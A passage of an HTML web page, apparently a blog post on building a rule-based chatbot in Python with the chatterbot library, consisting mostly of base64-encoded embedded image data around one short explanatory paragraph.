Vd+u72e7+DDskrIpKSeVJJEXCySpJTRBZGBZUaRQcMRp04M\/wAEGxvubtn5tHqlWeNJkTliSZtcUa+qtXDPd10oZmiqaOxV9RDIpwUdKd2Uj7RA0sXG\/wBFw34a0LWq3pIKOmoLTaqJW7NJKiZ4qWkh5gDyK0skSlsHlBJwcY1P8Yv4I97\/AHOXL81k1XXE2bm2Vtpc9+69o\/puh1hMY+UGwN0NCZr\/AMU75PWStzyCgpaSlpYif4kMbRPIEHk7SSRvOx1s+1\/XfGNur+nSej6b9GgFD2v674xt1f06T0fUDuu37r4e0Tbzod6XC9Wu3lHuttuy0wRaPnHbVEMsUKOssScz8rFkcKUwpYOtm6SOOH8DW+fuduH5u+gNHdF9v9VfrRsPadVFRXK8wVVZNcZoBMlDRU\/ZrLIiZAeYyVECIreKOZnYMI+zeTh4eXOOJEm4nbtndQA0rmhVnPnISmCj+YAfJqBt8nPxpsfXu2vd\/wA7t2rQ0uAoe1\/XfGNur+nSej6Pa\/rvjG3V\/TpPR9N+jQFbU3ss2TumksN7v1RuGyXwTeA3CrjgiqqOqjXn8FkEKIkqPGsro4QMvZMrl+ZSPkc25t9brulntF\/nsNj23LDTVlTSwxPV11Y8KzGFTKrpHCkU0BLBC7tIQGjEZ7SQ4ltyXbZDf9\/Tfo2t1g4UtzXjiC3+s0X6Jt+ouBLewSp+Hm5vnab9TrFTcOTRo6U2+NyoskjzMO2pzl2Ysx6w+Uk6cNGpApSbCq3jZE4g7ojYggOslKSp84DQEffBGki88QdycNdpb7m3fEt5rtjWmS80tRGyQtd6LsJHheRVHLDMZIJ4nCjlJjEihVcItya539Uq\/Lt\/i+vn4bRf\/wCrpcCxrVwZ2zUQrcd9ifdV6qYozV1NyqJJadZAOop6Yt2NMmemI0UkAFy7ZY7zcF+E7qUfh\/ZGVhgg0qkEac19yPta+6ATPaZ4VfAGy\/Rl1Ebl4R2O1WyovvDlH21frdBJPRvR1EsdJPIq5EdVTKwinjbHKedSyhiUZGwwsrWpdv3Krf5PJ\/ZOgK03HeaDc+0Np7rpYge3vO37hQyMPHhFRWU8bEeYmGeRD\/ouw8urW1QNgl5uDPDtc\/x9o\/nlFq\/tAGjULuvdto2da2ud1lOCeWKJOryt5lH9Z7hqmLtx43bVyv61wUdBDnxB2fauB8pbofvDXWyfkW15SWOivJ3vUj590v8ApO6O9Cais+UajdVq\/BBYpXb3rSV\/Ze032ajoHRqi9v8AHy8QTpFuS3wVVOejSU68kq\/LjPKftdPt6uq2XOhvNBDc7bULPTVC80ci+Uf\/AIPyax5QyTasmNZ+Op7Gta\/vrNzoh9IGQum8JPJVW+cdcoSWGaW+7tXim0nqZtaVrfZaO43vcU9RNXoy3GNAIK+eBceB059zG6gnr34z97TTpOkpo7hcbtaaksaauvscVQisV7SNbfFIUOO9WKAMO4qSD0J1zT2p93Daqm2CFrNZrzdg3MZQu4aqJkAK+5y5DEgsQCVHi4z16RdlW\/3C4wUtz2Lf7ZTSSESVL7omkEadmWB5VkyW5wEI7vGBDHqBivPC7g9aKi00FNwZ2VNJdatqOIGzUsaR8sEs2SREemISMAd5Gq\/4ibH2hZNwiktXBW1VcYoaeR6ezW7b0Qid5JwWd7iqFsiNQAndg5HUEgWvvLbtBS7brKiOpubNH2ZAkulTIp+yL3q0hB+0Rpy1SlittDYdm09JZ7LFZoLtQVlZV0MUFLCFnirIFUstIBB2oWUozx5D8i9WCqdWrunde29k2Op3Luy80tqtdIFM1VUvyomSFUfKSSAAOpJ0BLa559TD+6FL\/wCHu2v7VXroCjrKS40kFwoKmKopqmNZoZomDJJGwyrKR0IIIII1y5wiuG7LZZoqvZNsWvu\/sI2bFHAwBBikrJknbqQBywtI2T0HLkggY1ePmsstjL8ue\/ksu7KiwXS3pHRQ0MNXHVRzPJNLJI0oWIQLH34gkOeck+KACW6Q78fuGMcVFNLeKmNLiW8GLUMw7QLQeHkjxe4U3j\/z8vuumtD2xd6QbfjuG5+FTM+BDOVlYK0ik8spjaJikTEAqMu6l1XlJDEfV3Hue91tqluHBNVNuqIqyGWWsYeCyMjwmRAYBzMI5GwO\/lJ5uzYBdUKkzZ+MW0btbrTWmaSN7pbqe4GNMSCATPHGsbMv8btJAnyFWzjGneCZKiGOeMMFkUOvMpU4Iz1B6g\/IdV9SX7dV3huNOvCxbWYWjSOSrdXWpJaJHZVVPcBWlwWw2IxlMNgT+0dxbjvktVHednSWSGnjgMTyVHOZmdAzqq8i4CNlCT3kZA5SCQKg9Sx\/jdf9xu0\/yVZroTXPfqWP8br\/ALjdp\/kqzTXX8OafYtTu\/iH7OUssF0WuuN0qjSwwCEdmBDI8iKJJhEqv0lZyObxDGBym0\/OZMtpbOjVBXzblFcNzQ7sTjzZ6J7OfCQKqs55aOIwzUvjkzooCyzD3aAMycsgZjkNVJsncW56LbN8p+JNJcltlzW7xVlLzywVEeKtGhQiUjlaOpVOfmJAjPfkBakBx59zsP7rYfzGs0xcGf4INjfc3bPzaPS7x59zsP7rYfzGs1s7MN8HqcbD7GKxaS8ewuk8AqGp2nENR4EvZuY1Vi4DYPKFYnGMHu1Z+avb8iewm+MX8Ee9\/ucuX5rJqreIsxbaG2Fz37r2j+mqHTA9fvG5epi3LU7+pK6C+Db97jqPDTF2sqotQscpEcMKqHjCOFMSMFYBlDA6Ut\/Tc219rrnv3ZtL9NUOqkHR2q5tfF6Wqpoa24bSqooqmgoq+KOln7eZfCZGjEMiMqBJUYAOvMQMnr06ut\/nvFLapp7DTQ1FajIUjlzysvOOcdCOvLzY64zjPTOq\/o918aa+pWSLZ9vgofCKlWknhYSmJWVU5UE\/UjLPluUSBWXEZ5WcCe2\/xLpdwboTa8e27vRSNBcJ+2rFiVCKWqSnOOR2JDszMucHlXJAzrHxx6cGd9H\/V24\/m76grTX8co+IEcd0t0Mu156+4QvKY4AaelUxGllCq4kZnzKn+iMFgSMmc45fwMb7+5y4\/m76AX7HJz8abN17trXf87t2rB3bea7b22rlfbdbY7hPQU71C00k5hEoUZK84RyDgHHinrqtNryc\/Gq0de7a12\/O7fpxvb78bdBNnaaKgpko+xQxQNSVYlmK1JlJPbiSGNedQpjQ9oP208yoBo1\/GC12uSuSu29eCLZPUUtQ1NTmYGWJEk8TGMoyvgM\/IGcBF5mIGp3Z+8Y93veFjs1dbvWiuWiK1fIGlLU0M\/OAjMOXE4Hf3qdLtmvvGGrt1Eb5ti3UVbLRQzVSwLzrDUNLEJIgTKRlUaYZHMpMfMCQwU5rfeOLcl5p4azbtvS2rJKtRIVAlK+Ewxx8pExH7S00xbk6leTlUjLAfOKjclx2S3\/f0v6NrdYOEDc1z4gN\/rNH+irfr7xebkrNkn\/v+T9G1usPBduet383+s6foq36AZt57quG1fW2WlsiXCnq5p46hvCWjeFY6Wao5lURsHz2BXBK9WXrqCj4z2iQ0wj2xuGQ10EdTSqlGOZ1dOcKxZgiP5CpbKkqH5S6A45avi7Sy1VZQ0y1b1FTMpo66OEQUkSVkUUTwGJld1emaWdhI7sWjCgRFuTWWS98XHpKiWPbFEtRDFUGKFSOWaVey7JedpPcNmbqQpwB7g94DZtW\/LunbNq3KlFNRrdKOGsFPMQXi7RA3I2OmRnB1QvqnH5bLxaXz8N4f67pq4Np3PiLWXisi3VZKGltivMtJLCvLI6KlP2buO1fHOz1Hi4yvZAEnOTTHqo35bXxVXPfw4h\/tXTQF1Xfihsnb9fX2u73doJ7VFHNWYp5HEKuvMhJVT7oByMeRH\/yTr1JxQ2JGJi+4IlaGWWDleN0MjxxNKQnMBzgxozKy5VgMqTka87u21s5aOu3ZdtpwXOtpaOc+LFzTzq0Sq0Kny84SNcdxKr5hqor9vPh5TQW+8VvCOlrClUsbK1Q3bw1yVNvE8MCPGCxid0IU9n\/ibjlVRnQFnUvG3hzXUsVXR3uSdHllgl7Gllk8HeKISS9qVUqoVWAJzgt4oJbprctHEfZW+qC7U21r7HW1FFRJPUwGKSKWFJoy0ZdJFVlJAzgjI8uNVVct9cOJpLhsaqtKUFMtF29FcaK5HwIQ1YjiLUzkMJMO4OFiZeZ4jykuSLftu1LftTblVSUdTWVUpoglRU1UxeSpdIuXtXAwgcgDJVVzgDGAAAKb23KTwh4dpn\/nNpfnlFronXNO1pebhVw6XP8Azu0\/zyi10toDm3jHfZrvvaqpe1Y09uApolJ6AgAucefmyPtAaqWo4g7JpaqKhqNz29KmeY08cJlHO8gkljKgd5IennB83ZPnuOrW4wWWW0b4rZijCGvxVRMR0PMPG+8wP\/DVH1fBfZFZXTXCaGt7WarSt6VJ+xutRNUYQ96AzVEzHlIJ5yueXxdfXsn3qw0dGSuwrb6ud9\/ifzo6XqnU6U5SeXJTVTOz81J6sTu29ijhw71u1DBZt67V3BUwUdmvlNVT1NGLhDGhIaSmLcolAI6rkjr8o841e\/AXcngk1ysdbUJHSlFq0aRwqo\/MEIyf8rmX+cfLrnPaXCnZ2yaqhrbBRPDUW+2i0xSFhk0ofnEbAAA4brnvzk56tnoz1P1lmkr7lf3X7BHEKRMj3Tkhj94Af0hrUy7ryXU0lK\/VddvvVx3voqup9O7EsjSm4XyxYkk8OGWK+7Vddd7bu24dLHHZqDiRuHcke77fPT7gt9uggpDdDK6T0zVXasiMxVEKzQ9EwMqxIycncoJoai+1FRTypLFLfkdHRgysptSEEEdCCPLpsEMQOREmR\/ojStSgDcNWAMAbgXA\/\/a018sP3yUdx+9VhtDhV6p\/g7wNvGxrldrhu2qWWnukF1anhtslU8lFEzQDxanJaQMHICKeZeZugv29VNo2zVTbquu4KO2Q1oobY0laQsRkadkgRWLL4zyVIQDJySoHy\/n16qv1LM969Vht682OwbhroL3Xy3GS+U1juNVBt6aoRUzIYY2iqlWaNp41DwmJ5G7UyRcqr3lHsm5UFls2zbRUUEO37GbbHTCVJJKnsaN4mVS2QpY9ljOPLnroCO3rReASQwdr2ha3XKZmxjxpK2jc4Hmyx1J8QNvXTf217ntBKy\/7fjrGELXC1zUgneIEFgnarIoVxlTlc4z3a1uI3+OQf7orfzmh09aAhLHFWWW22qwrbKqWGkgjo2qW8Gj5VjiwJGSLlQZKgcsaAAsMKFHSlPUw\/uhS\/+Hu2v7VXrobXPPqYf3Qpf\/D3bX9qr1ePmsstjLd4iUN7r7JEll3HBYzDUx1E1XKXHRMmNPEI8VpeyDAkgpzKVYNjSxTbU4qQUE61O4KSruBoY4DUevNTElVUidS8vZCIrTB41ZsRhuUymMZVA7S3EndOwhTS7D3VfqmiqLutNAiUtG88vNUSSCAACKROZ2p5cKwOezfpgHVU1HC\/hj62Vu603Vvuustws9DJNVwVcEEXgctJLTxLGixpJGDHUGUqiqA3IRjkCihUtG22reVHva3pNuqnrqNVrau4U0tXIJAskjinaOJU5SAvZp4zhV5XIV2bnV\/1RfDCr4M7EuLttfeF+u81YlHZ1NTQPL2j8jMhEy06mVnCSPkuy4VggUALq9NAcucCt52zZCy3C609XLDU7V2tBmmp3lKctHcZizBQcLywsOY4AJGSB11a0fF3bW65K\/b527dGoPWe7z3CSfkiCPRyxwVFJhXLGTEoPMPEwVwxOQtWcD6OtrNv7k9abdTVt1g2Dtqa2Rzxo6isFLXdiRzgqDzEDJHlOrPscPEWp21c6S8WWGg3DFQVVPDc6eCBppXB5oyGaPsZAz8\/NmOMMQH7JBJypafnMmW0jbpu3hrTXtIrjsvcck9bVVFsp3p4pJ46iRaqVJzHGkhJ5FpWmdwnSPkUEuyxmTtvFm0LtmouW1dm3h4Y2t1bHFVyRQdtDc5+Zagc0jPyDnZ28XPeigsrKmK4Lvez0VttFt2HHd5jVrSy1zwUiEUcScyzScvKgYy9AiR48fKheUkZzeN+2a3192n2HbYjBQJUTJEo5ZZImACgJl\/FjJI6MfsYCjJxqpAs8UN6Um6\/YKlJabhSmPc1PNIakRYRmpbhH2ZKSNlgYmJxlcEeMc409cG6CB+E+yqkyVPNJtq1ggVMgQYpUxhQ2B39cDr5dJPEOtS57Z4cXFKGnpO23aoEUEJiVUWlrwvikdOnU4yuSSrMpDFm2Du\/b+zuC\/Diq3DcI6SO5WuyWulLn9sqZoI1RB\/xP2gTqz81e35E9hv8aLXTT8IN7I8tYoXb9wkHJWSocrTuwGQwyMjqO4jIOQSNVBveTm25tUZ792bT\/TNFqyt274s+++CG+bpZ4aqKNNvXFWSpjCsM0jkEFSVYEEEEEjr58jVU7wn57DtNfPu3af6ZotVILw3Rw+muV9rd2bcqLbbb7VWg2mO4SUXPNEpctzh1ZWODykLnB5cHvyIba3C7eO3bnDVy78aopojSwimWJ0\/Y8KnK8xZvdMSxXHLhiBg4YWfo0BUG8OA1dvG51FxrN8VVN2gr54o4IQeSrnQRxuHcsyIkUcSERGMtyMCQskivJcULfdbXwF35R3a5mvkWw3QxzMPH7MwOQGPQEjr3AYGB1ILNZukbjp04K78P+rlx\/N30AnbNfm41Wrr\/APS11\/O7fq37vQtc7VW21JjC1XTyQCQDPIWUjmx8mc6pjYcnacarb8m1rr+d2\/V5aAqG3cF95bXWSi2XxOe3UPhMNTHC1pp0B7OkMLI0dOIouWRxFI3IiY7EAD7IzasjalsvFm2\/R2y\/31rzcIFZZq5ohEZyWJBKjoOhA6ebUto0BW3Gc8s+yj\/rBJ+ja3WHgeeao36f9Z0\/RVv1943vyNspv9YJP0bW6w8B253343+s6\/oug0A4782ZT77siWGrrWpoPCoamRlpaeo5hG3MF5KiOSI5IHukOO8YYBgj0HCvilaLVQ2m1cXjBFRUdNRgtbufmERZuYAyYUn7DEcf82jk+O4Zbb0aA+AYAGScDvOuZPVUty2\/iiM9\/DmH+1dNdOa5c9Vg\/LScTV\/yuHUP9q56A6iX3I+1r7r4vuR9rX3QBrUu37lVv8nk\/snW3rUu37lVv8nk\/snQHNO0Xzwx4dLn\/ntp\/nlHrqHXKmzZubhzw6T\/APUbU\/O6PXVegIHeOzbTvS1+t9yUo8ZLwTp7uJsd484PlHl+2ARSd04H73op3SghprhED4kkcyoSPJkORg\/Jk\/b10Vo12MnZcteTY4KTTjuetezYz5z0x+izo703rK1W+EoVkrsdNqMmlsTvUk7uxtXpar7igtv8CNyVlSrbgmht9MOrhHEkrfIMeKPtk\/zHV4Waz2+w22C02unENNTryoo6n5ST5ST5dbujWLKOV7VlNrPvUuxal\/fWbnQ36Osg9BoyeS6bdSWpzm8U2t19ySXgkr9V99yDSkq1aXK8V1HSNVNRX2KZoUYB3Q0EEbFc9CQHLY8vLgdTpt0t2mpkiv8AuKkjanEhrYp+SWQq5Q0sChwMdVJRhnzqw8muYe6Fa73jelReqieybsrKG2v2bQwT7Nrah1OHDrkInTrGQep6EfbxvW7yENMIN\/XkTRyymdpdl1DCWNscigCJeUqebxvLkZBwcul63DU2OnSomt0tWJH5OWiikncdM5KopIHTv19su4am9071MVvkpAj8nLWxSQOemchWUEjr36AWtzGpu9ve8CGqWnoba9IZqqmaneollnp2JEbhWUDsepKgHnGM4OrB0rb1nqm27UUz+C81Q8UMarKSzu0igKox1OmnQBrnn1MP7oUv\/h7tr+1V66G1zTwU3BaNiU20dwbjqVobVftm2y2vcZ3VKaknp0aWNZnJxGJFnlAdsLzRqmeZ0DXir4sstjOiqmz2itqo66stdHPUwlTHNLArOhUkrhiMjBJIx3EnXgWCxCMRCy0HIIEpQvgyY7FM8keMe4XJwvcM9NRQ4lcOSMjf+2yD\/wB6wfW0e2Vw6+H23PwrB9bVCpKHb9hPQ2Sg932n+LJ7rxvG7u\/x36\/6Tec6kNLftlcOvh9tz8KwfW1E7m4zbBsNqmqrbuG3X65leWhtNsrIp6utmPRI0RSSASRl2wiLlnKqpIArX1LH+N1\/3G7T\/JVmuhNc9cKqm28Ib9DSbzulPQ0d121aLUlwlPJSJWUAqBIjythY+0WdDHzY5jG4znANw+2Vw5+H+3PwrB9bV6ialrLS1MZNGlv2yuHXw+25+FYPraPbK4dfD7bn4Vg+tqhUUOPPudh\/dbD+Y1msOyKvdVPwi2R6x7Wp73Eu0KF46eUxoJKrwVAitK8g7JMHBIjkJDHuxho\/iRurb2\/twbUsO0LzS3YWS7G9XOpopBPT08S0tRCkRlXKCVpJkIjzzcisxAHLle2lw+25ZOGNo4g3LeNxssd8sdglr2pYpJHZaeghRUHJmRFwhYtFyEK0pYkYZLteSvb8iz2DHuGs3+3Czf8AS7w2dS2qB9sXOWGammhYIRBIqwMqNk4Tl5WAIIDA8uFDVnvCcQ7asFfID4PbtwbcuFU\/kipoLpSSzSHzKkaO5PkCk6fN67Moq7h7urdtLvG53FLdt65J2E8DwRlzbXTmER5VXxX5lYL7lguSACFanWCrtEVLVRJNDNTLHJHIoZXUrgqQehBHTGqFTqDRrmS1Vu9LDQx2mw8Ttx0dBT5EFO4o6vslznlEtTTySlR5AznAwBgAAbfsl4l\/G3f\/AKBavQ9AdIaROO8ka8GN6xPIiNU2OrpYuZgOeaWIxxoM\/wAZndVA8pYDy6qr2S8S\/jbv\/wBAtXoeoy5U103FXUddvHdt33Cbe3aUkFY0MVNFJnIl7CnjjjeQEeK7qzJ15SuTkBk2DWwU3G6yJUv2fhu3btTQMw8V5hPRSdmD3cxSORgO8rG5\/inV\/wCuXLxb6W70qx1EtVDJTyCop6ikneCop5VzyyRSIQyt1I6HqCVOQSD5sm\/eJ9wtT3G4cUtw0PZPKHEtFagFVCfGJ8ExjA6nzg6gHUujXNse6eI80azQ8X768bqGVlorUQwPcQfA+o18j3XxFmLiHjDfHMbFH5aK1HlYd4P7D6HqOmpvA98d62lFZsm2eEx+GPeKitWDmHO0EdDURySAd\/KrzwqT5DIo8o1g9T\/XU5r9\/WppAtWl+greyPRjTy26ljjlA8ql4JlB88Tjyarahggmu1Xf62+1d8vFUOznrq2pEsioDjskVQI4Ywyn7HGqLzAkgtk6+3GOKkroNzUu4KywXChHIlxpKkRHkY47ORXBilQk9ElVlDYIAODqAdT6Nc3eyTiZ8bu4PoFq9D0eyTiZ8bu4PoFq9D1IOkdcveqPop943TiLtvbUlPV3GbZVPaViEoCpWsK90hkb+IxWeBjnqFlVsYIzuT33iPUwvTzcXdyGOVSj9nS22JsHvw6UgZT8qkEeQg607RbaGx0fgdAJeUsZJJZ53nmnkPupJZZCXkc+V2JY+U6A6M2tuWzbw29QbmsFYlVQXCBZoZFPn71YfxWUgqynqrAg4IOpXXKsm27E001RFSNSyVEhmnaknkpu2kOMu\/ZsvM3QdTk9NefY3af+uuf4Vqv1mgOrNQO\/NyWjaWz7tf75VrT0lLSuST1aRyOVI0Xvd3YqqqMlmYAAkga5x9jdp\/665\/hWq\/Wa9RbbsMVTT1r0PhNRSOZKaarleoeBiCpMbSFihIJBK46HQHyxW+ey7Y2PY6ogz0Fy21SyY7ueOupFP\/Ea6r1zBWyc1bYRn\/6ksn6Sp9dP6ANGjRoA0aNGgDUbd9t7d3AYzfbDbriYc9n4XSpNyZ78cwOM4GpLRoBc9rjh78Bdv\/gyH6uj2uOHvwF2\/wDgyH6umPRoCGtuzNoWaqWutG1bRRVKAhZqeiijcA9+GVQdTOjRoA1z\/wAOQtDtal2pPHLDXbXUWOtgmXldZKdQgfH+RIgSVD\/GSRGHfroDSruXhhsrdlyN7ulsnhubQLTPXW+uqKGpkhQsyRvJTujSIrO5VXJCl2IA5jnJTqZt3loSwsQjYbGxLNZqEk9STTp\/do9YLF7y0H0ZP7tMftE7L99d3fjRcP12j2idl++u7vxouH67WfSI7jJnELnrBYveWg+jJ\/drYpaGhoQy0VHBThurCKMJn7eNTftE7L99d3fjRcP12j2idl++u7vxouH67TSI7hnERTKrKVYAgjBB7jrRNgsROTZaD6Mn92mP2idl++u7vxouH67R7ROy\/fXd340XD9dppEdwziFz1gsXvLQfRk\/u0esFi95aD6Mn92mP2idl++u7vxouH67R7ROy\/fXd340XD9dppEdwziFa\/wB7tm0rHPdauN+wpkCxU9NFzyzyHokMMa9XkdiFVF6sxAHfrzYH4j2\/hRSbLvfCSmraizUVFR01PVSx1ENXHAsSrIV8ZVcMhcByOXCnBwcP1i4S7G2\/c6a9U9uq624URc0tTdLlU170zMvKzRdvI4iYqSpKAEgkdx046w1amcKTliKv3ZU7wvu2L5tOj4ZrT0l2pBbZJkrgjBZ4ZIpXVBF1MSoqjJAYsnjKuWFK7VulZV2WGnukSU92t48BulKCc01ZEOWWM564DAkHuZSrDIYE9daT9z8I+He77u24L3txPXV4UppK+jqJqOplhQkpHJLA6O6qWYqrEgczYxk6xFCjO3Pn0dufPq3P8H3hd733z8Zrn6Ro\/wAH3hd733z8Zrn6RoCo+3Pn0dufPq3P8H3hd733z8Zrn6Ro\/wAH3hd733z8Zrn6RoCo+3Pn0s3KxU27tl3PbNayinuXhVPISpOA0r9ehBz8oII7wRroL\/B94Xe998\/Ga5+kai9t8BOGdTazLLb70W8Kql6bkuS9FnkA6CfzAaA5gs3A6stUNfTTcW951sVTRimpO0q1iNC4i5BNGIlRCwYlgCpUeKMYUDXqu4KXKotFbaaHi3vCk8LpqenjqhWGWeAxOrc6M+Rl8ESZGWBGCMdesH4AcK4xzSUV6UEhctue5jqTgD\/GPKSBrTpuDHBWtqloqOevnqHp1q1hi3bcGdoGOFlCipyUJ7m7joDlex8BKPbc9fPZ997hp\/XK5Lc6hVmAHadtVSSBcYIVzVZI6jnjD4JZs5faOjm21ddt3bf+4rutxnpp4p7jUGd6JoZWlQw5OA3M3ecghUDBlHKepn4JcG4q+K1SNckrZgWjpm3ZcRK4AySqeE5OB16DWeHgHwpqYY6inpLzLFKoeORNz3JldSMggiowQR5dAckS8Er3euWfcnEi9M63EVy0sNQ0lOFhroaikjIfvEaU8aMVCsxZ2J6jGC2+p9udDLBNUcbt\/VzUzxmM1FyIJVBUYDhOVWJ7dCxIyxgQny67B\/wfeF3vffPxmufpGtaPghwcmljgh9cnklaVURd13Es7RNyyADwjqUbo3mPQ40BVnbnz6O3Pn1bEvAXhNBJDFNTXeN6hzHErbouQMjBSxVQajqeVWOB5AT5NZB6n7haSQKC95Hf\/APE1z9I0BUfbnz6O3Pn1bh9T7wuAybfewB\/rNc\/SNfE4AcK5EEkdDemVhkMu5rmQR9I0BUnbnz6O3Pn1bn+D7wu9775+M1z9I0f4PvC\/3vvn4zXP0jQFPW3t7\/vnbO07ZEaire6Ul1qeVh+xKOknSd5pB3hWaJIl8peVfIGI6o1AbR2Fs7YdPVU20dv0ltFdN4RWSxqWmqpeUL2k0rEvK\/KAOZ2JwAO4an9AGjRo0AaNGjQBo0aNAGjRo0AaNGjQBo0aNAGjRo0AaNGjQBo0aNAGjRo0AaNGjQBo0aNAGjRo0AaNGjQFc7o2lxCuXF\/au67NuOal2xaYJEuNuWukSOrZ0mUmSIDlcqWhKk56g55cDLdtT9xz\/LKz85k1Mah9qfuOf5ZWfnMmgMe9VoZNuVENwq6ylilkhRZqSLtJY5DKnZkDlYe75epGB3npqup7vwx2\/QXy0DeNZYqfwISioIYNSYqnRZIecMjdlOypkoy8xRMnPLq26ujpK+A0tdSw1ELFWMcqB1JUhlOD0yCAR5iBqOO0Nps0jNti0lpm5pCaKPLtknJ6dTkk\/bJOgKz2xa+GdguFi3JSbpvVS9OK+GgWogkkMyRzClcYEfMwV5Yo0Pe2UxzE6iqKp4O7ThK0m6a6q8Jsht6zU9OQlNSis8DeVeVVjT7M\/jDB5mi5lBJw9yybX21NH2M23ra8f2UcrUkZH2WRZZOmP48iI7edlUnqAdabbA2I5dn2XYmMvuybdCebx+fr4vXx\/G+3179AVxU2DhxdRWV8m5rzU+BySVNSIaSdSs0cnI3cmRKjuoCjqo90pVmztTWvhrDtWOWC6yTU9MLkYXp6JQGWokWtkCKUCiMAKUJPJylTljg6sCDZO16e4V9yitFOHuaPHVx8g7KYOwZ+ZPctlsscg9Wc97tnZG2duCmko0sVvSCUyF40pkUMXXlc9B3lehPlHTQFayz8Md12+moqS7XdqY9pLS1FPRyr2r1lUEZ1bs+rZ5kzj3EjnqMkQu4rBwhMl\/s944g1tPWStWyXN448SQsWikkYERkLyK0aKxyQjuuTzEi2bPsXaljt0dqobLTGmhKmNJYw\/Jg8yhcjxQGHMAMDOT3kk5ZtmbPqJnqKjatnklld5Hd6GIszPnnYkr1LczZPlyc9+gKli23wsnlnakvd3p4qetrO1oYraZY0mqO2yMRxMMBOYcoPREjDYxjTPZ+I\/CfbU1fR027oKiojSkeojjpneaIGOKKINyL0BzGAD3M5HlwG+3bH2raa6quFBZqaGSsZWlRYwIyyqVBC4xnBIz5ASBjJzmfaO1JGLSbZtTkhAS1HGeiFCnk8hjjI8xRfMNAak2\/9rU88VNUV08cs1OtSqtRT9IyFPjHkwpAdSVJBAOSAOuvY33tY0rVguMhRCwZRSzdopWRY2Bj5OcEOygjGRn5DrJDszbVPdfXiG1QLP4MtGAEHIsKgBUC9wAAwB3DmbGOZs\/JdjbNmhEDbWtQjChOVaONQUEgk5Dge551DFe4kZ0Bu2i+Wu\/QTVVpqhURQVEtLI4RlAljYq69QM4YEZHTI1v61aG1221iYW2301IKmUzzCCJU7SUgAu2B1YgAZPXoPNra0AaNGjQBo0aNAGjRo0AaNGjQBo0aNAGjRo0AaNGjQBo0aNAGjRo0AaNGjQBo0aNAYaurpbfSTV9dUx09NTRtNNNKwVI0UZZmJ6AAAknScnFmyzoJaXa+85oX6pIu2a1Q484DRg4+2BqX4hAHYW5ARkG01f5FtMGgEr21Lb8EN6\/i3V\/U0e2pbfghvX8W6v6mnXVT1PHqOl3pdtm+w6tqHtdzFA1RBUxcpVhQqjsHKkEy3CNeUc2FVmz\/F0Ax+2pbfghvX8W6v6mj21Lb8EN6\/i3V\/U1XEHqq6O6kUNr2bWx1sa2l55Zpo5KRfDJ6RCiSI3M5VKxSGC4545FOOUc2WD1UtDTQ0iXPZ9ynnltdTdp2ogDFFFDHIxGWPeWj5epX3akZCuUAsF+KduZGVdp72UkEBhturyPl6pqE2bv2WyWXwK+WLeVbVGonlMi7XqkHK8hYdBGO\/OT5ixHcBqCq\/VPUUVtNwptgXhh2SkGoqaeFBKYklKMxclVETM5fl5cKPP0lN6eqDteyN5zbZuO17pNQU1ma4yXaGJ2pRViN5hRdrydkJPB4nlPNIDho8KwYlQGX21Lb8EN6\/i3V\/U0e2pbfghvX8W6v6mku7eqd29a6+qgSwTVVJG3Z01XFX06pOwnro2clmCpFi3yFZC2GaSJOjMM5K\/wBUzt+0V0\/rxtK9Ulppu1ea5O0JSOJDWrzmIP2nVrfOMcuR4pOM6AcPbUtvwQ3r+LdX9TR7alt+CG9fxbq\/qarkeqvtUlBT3tdoV8VvNM1VMDNE9U6pLWxyJFAGBYg0TEMSB9kQEKSNNW0ePFu3duO37dpNsVsfhZMctWtXTzU8Uua0KFeNz2qn1vm8Zcgcyg4PMFAnPbUtvwQ3r+LdX9TR7alt+CG9fxbq\/qaTqb1R1KxxUbTmmIuNzpJFoq6GU08FFWJTyTShyhBPaK4QAnvHy6+Wf1SFPf6d662bHuxj8JqqKCCZ4o5aiWKeiiDAswVU5q3BOSD2bFSwwWAcvbUtvwQ3r+LdX9TR7alt+CG9fxbq\/qaieFvHWwcWLxX2yxWC8UkVHR01atTWxxosizRRyBcKxIIEq9\/Q4JBxgmy9AJ1LxT29NXUtDXWzcVqNZMtPDPcrJVU1OZWOEQzOnIjMcKoYjmYhRliAXHS3xDUNtOp5gDiopCMjyipjIP39MmgDRo0aANGjRoA0aNGgDRo0aANGjRoA0aNGgDRo0aANGjRoA0aNGgDRo0aANGjRoA0aNGgDRo0aAid22yrvW1bzZ6BohVV1BUU0BlJCCR42VeYgEgZIzgHppaTinUIgSu4d7kpqgDEsJloH5G8o5lqcH7Y0aNAffbVT4C7j\/pUPpOj21E+Au4\/6VD6To0aAPbUj+Au4\/wClQ+k6h59zbaqdyQbtn4a7ja600axRz9vSgAKJVXKCq5CQJ5gGIJAkYA9To0aAmPbUj+Au4\/6VD6To9tRPgLuP+lQ+k6NGgD21I\/gLuP8ApUPpOj21I\/gLuP8ApUPpOjRoA9tSP4C7j\/pUPpOj21I\/gLuP+lQ+k6NGgPh4pxEEHYm4iD3+NQ+k6h9rbl2zsq3etO2eGu46OkHIFi8IpZAqoioiqXqiQqoiqqjoAAABo0aAmfbUj+Au4\/6VD6To9tVPgLuP+lQ+k6NGgNO6bpum94Itt2fZd1pmqamneerrZqRYaeFJVd3PZzO7NyqQqqpyxXJVcsLG0aNAGjRo0AaNGjQH\/9k=\" width=\"305px\" alt=\"rule based chatbot python\"\/><\/p>\n<p><p>We will use the&nbsp;chatterbot&nbsp;python library, which is mainly developed for building chatbots. The rule-Based chatbot may be based on a rule given by humans, but it doesn\u2019t mean that we would not use any dataset to create one. The main aim of chatbots is still to automate the question given by humans, so that\u2019s why we need data to develop the rules. The chatbot picked the greeting from the first user input (\u2018Hi\u2019) and responded according to the matched intent.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='display: block;margin-left:auto;margin-right:auto;' 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y9RLI1URSnavbbGxxdqfzo3nic\/Ncz2yWtsT1qHISKc\/h57exCOObff\/b+KW4xm5Vb9rGWtPmcx+j+NxtM\/moymMu8u1lxxqv8awcu17jZc7x+piuTRPLNNbXo8kaNVg5H8K\/6dhB3cXX++uS8tyyPnJeq5\/y\/090Wz6aBnlYrE0ds3JO5mces4sytZCV7Qt8XthdaqHnusRuHeOiNFb6T2HK3\/RI96Zv1s\/8XZxbK4jv8Xled3KumdK1NVbChjNHNpY53nbuWifHOtqbs6nc1+8x9ZbnEnPfqBwvs88qv+sxXZclhnGM7Tm7TlZjG2U\/gzrLsV\/V32CN7sqw1agnJYfyAywrSFIt+KVhtvDrfefYKnEl8H3eYPxaoF0igHYupRJIda8rGiE3lrz\/iEf+q95t7vnYvUDLdXlBqORrv\/V\/4yjuceP1Y12iOEcFJgrSjWXuaZtRUfTfAtqc6fl0Hclza7\/k3KkO0ljn9aaOyn8H3Mb3+ZDzeJkF7